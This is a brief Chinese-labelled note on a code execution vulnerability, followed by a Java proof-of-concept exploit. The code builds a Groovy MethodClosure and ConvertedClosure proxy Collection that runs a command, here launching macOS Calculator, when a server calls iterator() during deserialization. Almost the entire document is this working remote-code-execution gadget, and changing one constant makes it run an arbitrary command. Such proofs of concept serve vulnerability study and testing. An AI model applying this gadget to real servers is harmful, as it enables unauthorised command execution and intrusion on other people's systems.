1:代码执行漏洞
可能会执行服务器的应用程序
private static final String COMMAND = "/Applications/Calculator.app/Contents/MacOS/Calculator";
private static Collection<String> makeExploitCollection() {
//Create a mock collection with the reflection api that only implements iterator which we know will be called on the server
MethodClosure methodClosure = new MethodClosure(COMMAND, "execute");
ConvertedClosure iteratorHandler = new ConvertedClosure(methodClosure, "iterator");
Collection exploitCollection = (Collection) Proxy.newProxyInstance(
Client.class.getClassLoader(), new Class<?>[]{Collection.class}, iteratorHandler
);
return exploitCollection;
}